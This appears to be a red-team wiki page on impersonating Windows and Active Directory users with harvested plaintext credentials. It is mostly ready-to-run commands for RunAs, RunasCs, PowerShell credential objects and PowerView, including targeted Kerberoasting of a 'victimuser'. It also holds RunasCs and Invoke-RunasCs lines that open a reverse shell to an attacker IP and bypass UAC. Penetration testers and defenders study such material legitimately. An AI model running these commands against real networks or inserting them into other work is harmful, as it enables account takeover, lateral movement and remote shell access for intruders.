# Impersonation

On windows or Active Directory environments, when credentials are found (through [dumping](https://red.infiltr8.io/redteam/credentials/broken-reference) or [cracking](https://red.infiltr8.io/ad/movement/credentials/cracking) for instance), attackers try to use them to obtain access to new resources. Depending on the harvested credential material type, the impersonation can be done in different ways.

* **LM or NT password hash**: [pass-the-hash](https://red.infiltr8.io/redteam/credentials/broken-reference)
* **RC4 Kerberos key (i.e. NT hash)**: [overpass-the-hash](https://red.infiltr8.io/ad/movement/kerberos/ptk)
* **non-RC4 Kerberos key (i.e. DES or AES)**: [pass-the-key](https://red.infiltr8.io/ad/movement/kerberos/ptk) (alias for overpass-the-hash)
* **Kerberos ticket**: [pass-the-ticket](https://red.infiltr8.io/redteam/credentials/broken-reference)
* **plaintext password**: the techniques listed below

{% tabs %}
{% tab title="RunAs" %}
RunAs is a standard Windows command that allows to execute a program under a different user account. When stuffing an Active Directory account's password, the `/netonly` flag must be set to indicate the credentials are to be used for remote access only.

```bash
runas /netonly /user:$DOMAIN\$USER "powershell.exe"
```

Since the password cannot be supplied as an argument, the session must be interactive.
{% endtab %}

{% tab title="RunAsCs" %}
[RunAsCs](https://github.com/antonioCoco/RunasCs) is a C# version of RunAs. It may be very handy on environements without the native RunAs.exe.

```powershell
#RunAs locally 
RunasCs.exe $USERNAME $PASSWORD $Command -d $DOMAIN

#RunAs and spawn a revers shell and bypass UAC
RunasCs.exe $USERNAME $PASSWORD cmd.exe -d $DOMAIN -r $ATTACKING_IP:$PORT --bypass-uac
```

Or, we may use the powershell version

```powershell
#RunAs and spawn a revers shell
. .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username $USERNAME -Password $PASSWORD -Domain $DOMAIN -Command $CMD -Remote $ATTACKING_IP:$PORT
```

{% endtab %}

{% tab title="Powershell" %}
In Powershell, it is possible to impersonate a user by create a credential object and supplying it with the `-Credential` argument in the next command.

```bash
# Credential object creation (prompted)
$credential = Get-Credential

# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Start-Process Notepad.exe -Credential $credential
```

{% endtab %}

{% tab title="PowerView" %}
Most of [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)'s functions have the `-Credential`, `-Domain` and `-Server` parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous "Powershell" tab, the -Credential option has to be supplied with a credential object.

Here is an example for [targeted Kerberoasting](https://red.infiltr8.io/ad/movement/dacl/targeted-kerberoasting).

```bash
# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}
$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'
$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl
```

{% endtab %}
{% endtabs %}

[SharpLdapWhoami](https://github.com/bugch3ck/SharpLdapWhoami) can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC).

```powershell
.\SharpLdapWhoami.exe
.\SharpLdapWhoami.exe /method:kerberos /all
```